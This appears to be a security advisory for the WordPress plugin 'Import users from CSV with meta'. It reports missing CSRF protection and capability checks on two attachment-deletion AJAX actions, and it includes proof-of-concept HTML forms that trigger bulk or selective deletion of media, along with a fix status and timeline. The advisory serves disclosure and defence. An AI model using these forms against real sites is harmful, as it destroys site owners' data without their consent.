Import users from CSV with meta [CSRF]

Description

Plugin implements the following AJAX actions:

  • acui_bulk_delete_attachment
  • acui_delete_attachment

Both of them are deleting attachments from the website. None of them introduce CSRF prevention controls. This allows an attacker to leverage the CSRF vulnerability in order to delete all or selected media from the infected website.

Since there also are no capabilities checks, any authenticated user could exploit this vulnerability.

PoC

Bulk delete:
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="acui_bulk_delete_attachment">
    <button type="submit" value="Submit">Submit</button>
</form>

Selective delete:
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="acui_delete_attachment">
    <input type="text" name="attach_id" value="" placeholder="Attachment ID">
    <button type="submit" value="Submit">Submit</button>
</form>

Solution

Latest versions are patched regarding the acui_delete_attachment action. acui_bulk_delete_attachment appears to still be vulnerable, though it would only delete CSV files uploaded as attachments.


WordPress Plugins CSRF
INFO
TIMELINE
  • 2017-10-03:
    Discovered
  • 2019-03-17:
    No longer valid (fixed in the meanwhile)